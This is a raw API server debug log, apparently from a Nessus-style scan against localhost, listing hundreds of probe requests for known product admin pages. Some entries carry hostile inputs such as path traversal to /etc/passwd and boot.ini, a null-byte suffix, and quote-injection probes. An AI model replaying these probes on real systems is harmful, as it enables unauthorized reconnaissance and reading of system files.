GET:/api/nessus-check/tomcat_error_version.nasl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.399Z debug: [1667344917398, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.405Z debug: [1667344917404, duration: 1] GET:/api/ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.434Z debug: [1667344917433, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.440Z debug: [1667344917439, duration: 0] GET:/api/tightvnc-jviewer.jar, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.467Z debug: [1667344917465, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.473Z debug: [1667344917472, duration: 1] GET:/api/VncViewer.jar, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.499Z debug: [1667344917498, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.505Z debug: [1667344917504, duration: 1] GET:/api/spotfire/about.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.530Z debug: [1667344917528, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.536Z debug: [1667344917534, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.578Z debug: [1667344917576, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.585Z debug: [1667344917583, duration: 2] GET:/api/etc/passwd, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.591Z debug: [1667344917591, duration: 0] GET:/api/etc/passwd, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.623Z debug: [1667344917621, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.682Z debug: [1667344917681, duration: 0] GET:/api/en/admin/aggregate.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.687Z debug: [1667344917686, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.697Z debug: [1667344917696, duration: 0] GET:/api/spywall/login.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.709Z debug: [1667344917708, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.716Z debug: [1667344917715, duration: 1] GET:/api/brightmail/viewLogin.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.738Z debug: [1667344917737, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.746Z debug: [1667344917746, duration: 0] POST:/api/webui/apps/sdcss, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.761Z debug: [1667344917760, duration: 1] GET:/api/.svn/entries, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.790Z debug: [1667344917789, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.793Z debug: [1667344917792, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.797Z debug: [1667344917797, duration: 0] GET:/api/index.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.801Z debug: [1667344917800, duration: 0] GET:/api/idm/login.jsp?lang=en&cntry=, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.806Z debug: [1667344917805, duration: 1] GET:/api/index.JSP, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.843Z debug: [1667344917841, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.846Z debug: [1667344917845, duration: 0] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.849Z debug: [1667344917848, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.853Z debug: [1667344917851, duration: 1] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.880Z debug: [1667344917878, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.883Z debug: [1667344917881, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.886Z debug: [1667344917885, duration: 1] GET:/api/userportal/webpages/myaccount/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.890Z debug: [1667344917889, duration: 0] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.893Z debug: [1667344917893, duration: 0] GET:/api/webconsole/webpages/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.919Z debug: [1667344917917, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.927Z debug: [1667344917926, duration: 0] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.936Z debug: [1667344917935, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.943Z debug: [1667344917942, duration: 0] GET:/api/api/sonicos/is-sslvpn-enabled, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.960Z debug: [1667344917958, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.966Z debug: [1667344917965, duration: 1] GET:/api/sgms/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.974Z debug: [1667344917973, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.981Z debug: [1667344917980, duration: 1] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.997Z debug: [1667344917995, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.002Z debug: [1667344918001, duration: 1] GET:/api/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.010Z debug: [1667344918008, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.011Z debug: [1667344918010, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.046Z debug: [1667344918044, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.057Z debug: [1667344918055, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.060Z debug: [1667344918058, duration: 0] GET:/api/admincp/login.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.064Z debug: [1667344918063, duration: 0] GET:/api/helpdesk/WebObjects/Helpdesk.woa, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.096Z debug: [1667344918094, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.100Z debug: [1667344918096, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.103Z debug: [1667344918102, duration: 0] GET:/api/swvm/ConsoleContainer.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.107Z debug: [1667344918107, duration: 0] GET:/api/Orion/Login.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.114Z debug: [1667344918113, duration: 1] GET:/api/Orion/Login.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.131Z debug: [1667344918130, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.142Z debug: [1667344918141, duration: 1] GET:/api/lem/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.160Z debug: [1667344918159, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.167Z debug: [1667344918166, duration: 0] POST:/api/av-centerd, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.174Z debug: [1667344918173, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.180Z debug: [1667344918179, duration: 1] GET:/api/forum/register.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.191Z debug: [1667344918191, duration: 0] GET:/api/sitemap.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.194Z debug: [1667344918193, duration: 1] GET:/api/sitemap/sitemap.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.196Z debug: [1667344918195, duration: 1] GET:/api/map/sitemap.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.206Z debug: [1667344918205, duration: 0] GET:/api/SilverStream, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.222Z debug: [1667344918222, duration: 0] GET:/api/SilverStream/Meta/Tables/?access-mode=text, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.242Z debug: [1667344918241, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.247Z debug: [1667344918247, duration: 0] GET:/api/stream/0, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.275Z debug: [1667344918274, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.282Z debug: [1667344918281, duration: 1] GET:/api/content/W7ViyfJJRO.mp3, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.311Z debug: [1667344918310, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.319Z debug: [1667344918318, duration: 0] GET:/api/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=bootstrap, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.346Z debug: [1667344918345, duration: 1] GET:/api/servlet/com.newatlanta.servletexec.JSP10Servlet, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.361Z debug: [1667344918360, duration: 1] GET:/api/global.asa, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.390Z debug: [1667344918389, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.398Z debug: [1667344918398, duration: 0] GET:/api/wbm/login/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.437Z debug: [1667344918435, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.444Z debug: [1667344918443, duration: 0] GET:/api/Portal/Portal.mwsl?MainSelection=USFW&TabSelection=NONE&ClientArea=/Portal/usfw-login.mwsl&DataFile=NONE&TemplateFile=NONE, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.474Z debug: [1667344918472, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.482Z debug: [1667344918479, duration: 2] GET:/api/InitialPage.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.514Z debug: [1667344918513, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.534Z debug: [1667344918523, duration: 1] GET:/api/home.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.559Z debug: [1667344918558, duration: 1] GET:/api/home.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.580Z debug: [1667344918579, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.587Z debug: [1667344918586, duration: 0] GET:/api/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.618Z debug: [1667344918616, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.624Z debug: [1667344918623, duration: 0] GET:/api/no_such_file_4ufXle0X.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.652Z debug: [1667344918651, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.661Z debug: [1667344918660, duration: 1] GET:/api/plc/webvisu.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.705Z debug: [1667344918703, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.711Z debug: [1667344918710, duration: 0] GET:/api/html/iscscada.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.737Z debug: [1667344918735, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.745Z debug: [1667344918743, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.777Z debug: [1667344918776, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.783Z debug: [1667344918782, duration: 1] GET:/api/OEMSettings.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.813Z debug: [1667344918812, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.820Z debug: [1667344918820, duration: 0] GET:/api/web/signin, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.827Z debug: [1667344918826, duration: 1] GET:/api/main/web/status/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.860Z debug: [1667344918859, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.867Z debug: [1667344918866, duration: 0] GET:/api/broadWeb/bwRoot.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.896Z debug: [1667344918895, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.904Z debug: [1667344918904, duration: 0] GET:/api/iView3/pages/version.frag, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:58.954Z debug: [1667344918953, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.961Z debug: [1667344918960, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.986Z debug: [1667344918985, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:58.993Z debug: [1667344918992, duration: 1] POST:/api/sawmillcl.exe, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.001Z debug: [1667344919000, duration: 1] GET:/api/sawmillcl.exe?ho+{COMPLETE_VERSION}, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.008Z debug: [1667344919007, duration: 0] POST:/api/sawmill6cl.exe, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.015Z debug: [1667344919015, duration: 0] GET:/api/sawmill6cl.exe?ho+{COMPLETE_VERSION}, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.025Z debug: [1667344919024, duration: 1] POST:/api/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.033Z debug: [1667344919032, duration: 1] GET:/api/?ho+{COMPLETE_VERSION}, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.106Z debug: [1667344919104, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.113Z debug: [1667344919112, duration: 0] GET:/api/SAPHostControl/?wsdl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.142Z debug: [1667344919141, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.150Z debug: [1667344919149, duration: 1] GET:/api/sapmc/sapmc.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.182Z debug: [1667344919180, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.188Z debug: [1667344919188, duration: 0] GET:/api/AdminTools/querybuilder/nn.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.256Z debug: [1667344919255, duration: 1] GET:/api/search/results.stm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.273Z debug: [1667344919272, duration: 1] GET:/api/WebID/IISWebAgentIF.dll?postdata=">, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.300Z debug: [1667344919299, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.307Z debug: [1667344919306, duration: 0] GET:/api/apps/zxtm/login.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.338Z debug: [1667344919337, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.348Z debug: [1667344919347, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.387Z debug: [1667344919385, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.393Z debug: [1667344919392, duration: 1] GET:/api/vncviewer.jar, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.417Z debug: [1667344919417, duration: 0] GET:/api/names.nsf/view?ReadDesign, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.443Z debug: [1667344919442, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.451Z debug: [1667344919450, duration: 0] GET:/api/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.479Z debug: [1667344919478, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.487Z debug: [1667344919487, duration: 0] GET:/api/cgi-bin/authLogin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.517Z debug: [1667344919516, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.524Z debug: [1667344919523, duration: 1] GET:/api/photo/lang/ENG.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.575Z debug: [1667344919574, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.583Z debug: [1667344919581, duration: 2] GET:/api/1667344982/facts/ad-daisy-seed01.test-server.ag, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.586Z debug: [1667344919585, duration: 1] GET:/api/1667344982/certificate/ad-daisy-seed01.test-server.ag, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.589Z debug: [1667344919589, duration: 0] GET:/api/v2.0/environments/ad-daisy-seed01.test-server.ag, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.591Z debug: [1667344919591, duration: 0] GET:/api/puppet-ca/v1/certificate/ad-daisy-seed01.test-server.ag, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.593Z debug: [1667344919593, duration: 0] GET:/api/puppet/v3/facts/ad-daisy-seed01.test-server.ag, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.639Z debug: [1667344919637, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.649Z debug: [1667344919647, duration: 1] GET:/api/cas/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.655Z debug: [1667344919654, duration: 1] GET:/api/auth/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.698Z debug: [1667344919695, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.705Z debug: [1667344919704, duration: 0] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.740Z debug: [1667344919738, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.747Z debug: [1667344919746, duration: 1] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.777Z debug: [1667344919775, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.784Z debug: [1667344919783, duration: 1] GET:/api/ad_click.asp?banner_id=', reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:59.809Z debug: [1667344919808, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:59.816Z debug: [1667344919815, duration: 0] GET:/api/dagent/proxyreg.asp?List=, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.390Z debug: [1667344920388, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.396Z debug: [1667344920395, duration: 1] GET:/api/perl?-v, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.403Z debug: [1667344920403, duration: 0] GET:/api/perl.exe?-v, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.433Z debug: [1667344920431, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.441Z debug: [1667344920440, duration: 1] GET:/api/cgi-bin/pdesk.cgi?lang=../../../../../../../../etc/passwd%00, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.465Z debug: [1667344920464, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.471Z debug: [1667344920471, duration: 0] GET:/api/html/en/index.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.496Z debug: [1667344920495, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.502Z debug: [1667344920501, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.526Z debug: [1667344920525, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.532Z debug: [1667344920531, duration: 0] GET:/api/PAN_help/en/wwhelp/wwhimpl/common/private/title.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.556Z debug: [1667344920555, duration: 0] GET:/api/login.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.572Z debug: [1667344920572, duration: 0] GET:/api/exchweb/bin/auth/owalogon.asp?url=http://12345678910, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.590Z debug: [1667344920589, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.596Z debug: [1667344920595, duration: 1] GET:/api/owa/auth/logon.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.601Z debug: [1667344920601, duration: 0] GET:/api/exchange/logon.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.634Z debug: [1667344920632, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.640Z debug: [1667344920639, duration: 1] GET:/api/otrs/index.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.672Z debug: [1667344920670, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.680Z debug: [1667344920679, duration: 0] GET:/api/ossim/session/login.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.705Z debug: [1667344920703, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.711Z debug: [1667344920710, duration: 0] GET:/api/av/api/1.0/system/local/tasks, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.736Z debug: [1667344920735, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.742Z debug: [1667344920741, duration: 0] GET:/api/.DS_Store, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.773Z debug: [1667344920772, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.779Z debug: [1667344920779, duration: 0] GET:/api/ws_utc/login.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.785Z debug: [1667344920785, duration: 0] GET:/api/wls_utc/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.817Z debug: [1667344920815, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.824Z debug: [1667344920823, duration: 1] GET:/api/cs/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.831Z debug: [1667344920830, duration: 1] GET:/api/idc/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.838Z debug: [1667344920838, duration: 0] GET:/api/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.870Z debug: [1667344920869, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.877Z debug: [1667344920876, duration: 0] GET:/api/web-determinations/?CookieSet=true, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.908Z debug: [1667344920906, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.914Z debug: [1667344920912, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.939Z debug: [1667344920938, duration: 0] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.944Z debug: [1667344920944, duration: 0] GET:/api/sgdadmin/faces/jsp/Version.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:00.968Z debug: [1667344920967, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:00.975Z debug: [1667344920975, duration: 0] GET:/api/gateway/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.003Z debug: [1667344921001, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.010Z debug: [1667344921009, duration: 0] GET:/api/portal/page/portal/Design_Time_PG/Welcome, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.015Z debug: [1667344921015, duration: 0] GET:/api/page/portal/Design_Time_PG/Welcome, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.063Z debug: [1667344921061, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.069Z debug: [1667344921069, duration: 0] GET:/api/portal/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.078Z debug: [1667344921077, duration: 1] GET:/api/portal/pls/portal/DEV_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.084Z debug: [1667344921084, duration: 0] GET:/api/portal/pls/portal/DEV1_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.093Z debug: [1667344921092, duration: 1] GET:/api/portal/pls/portal/DEV2_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.101Z debug: [1667344921100, duration: 1] GET:/api/portal/pls/portal/DEV3_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.109Z debug: [1667344921107, duration: 1] GET:/api/portal/pls/portal/DEV4_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.115Z debug: [1667344921113, duration: 0] GET:/api/portal/pls/portal/DEV5_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.121Z debug: [1667344921120, duration: 0] GET:/api/portal/pls/portal/DEV6_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.127Z debug: [1667344921127, duration: 0] GET:/api/portal/pls/portal/DEV7_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.134Z debug: [1667344921133, duration: 1] GET:/api/portal/pls/portal/DEV8_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.140Z debug: [1667344921139, duration: 1] GET:/api/portal/pls/portal/DEV9_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.145Z debug: [1667344921145, duration: 0] GET:/api/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.151Z debug: [1667344921150, duration: 1] GET:/api/pls/portal/DEV_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.158Z debug: [1667344921157, duration: 1] GET:/api/pls/portal/DEV1_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.165Z debug: [1667344921164, duration: 0] GET:/api/pls/portal/DEV2_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.170Z debug: [1667344921169, duration: 1] GET:/api/pls/portal/DEV3_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.176Z debug: [1667344921175, duration: 1] GET:/api/pls/portal/DEV4_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.182Z debug: [1667344921181, duration: 1] GET:/api/pls/portal/DEV5_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.189Z debug: [1667344921188, duration: 1] GET:/api/pls/portal/DEV6_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.194Z debug: [1667344921194, duration: 0] GET:/api/pls/portal/DEV7_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.200Z debug: [1667344921199, duration: 0] GET:/api/pls/portal/DEV8_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.205Z debug: [1667344921205, duration: 0] GET:/api/pls/portal/DEV9_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.298Z debug: [1667344921296, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.305Z debug: [1667344921304, duration: 0] GET:/api/mapviewer/omserver?getv=t, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.336Z debug: [1667344921334, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.342Z debug: [1667344921341, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 